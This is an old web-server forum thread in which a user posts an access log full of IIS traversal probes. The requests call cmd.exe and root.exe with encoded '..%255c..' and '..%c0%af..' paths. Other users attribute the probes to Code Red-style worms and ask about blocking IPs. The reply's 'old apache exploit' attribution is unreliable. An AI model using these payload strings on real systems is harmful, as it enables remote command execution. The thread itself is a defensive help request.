FAQ  |  Search  |  Register  |  Profile  |  Log in to check your private messages  |  Log in
More hacking or/ RE: why i ask

 
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions
View previous topic :: View next topic  
Author Message
CANCERMAN
Guest
PostPosted: Sun Jan 26, 2003 12:59 pm    Post subject: More hacking or/ RE: why i ask Reply with quote
I see that other pepole have a problem thats remind of min but their access.log file does no look like min. Some parts are alike but some parts does not remind of other persons log file,


213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
213.113.110.16 - - [26/Jan/2003:02:21:01 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.113.110.16 - - [26/Jan/2003:02:21:02 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:32 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
213.73.214.209 - - [26/Jan/2003:07:07:32 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:33 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:34 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:35 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:38 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:38 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
213.73.214.209 - - [26/Jan/2003:07:07:39 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
62.160.179.5 - - [26/Jan/2003:08:57:22 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 400 429

is this a hackin thing to... :?:
Back to top
Bluedog
-


Joined: 05 Jan 2003
Posts: 179
PostPosted: Sun Jan 26, 2003 8:25 pm    Post subject: Reply with quote
yes, this is caused by scripts such as codered trying (and failing) to use an old apache exploit to gain access to your pc.
Back to top View user's profile Send private message Visit poster's website
Illuminator
Guest
PostPosted: Tue Jan 28, 2003 5:38 am    Post subject: More hacking or/ RE: why i ask Reply with quote
I suppose the next logical question would be - is it possible that one can configure the server to block specific IP addresses, or should this be done via a firewall?

Thanks.
Back to top
Illuminator
-


Joined: 28 Jan 2003
Posts: 1
PostPosted: Tue Jan 28, 2003 5:51 am    Post subject: Reply with quote
Nevermind....
I will examine some other avenues of blocking the IP involved.
I actually read the other posts to understand that the server itself does not yet allow the capability of blocking IPs.

Thanks.
Back to top View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group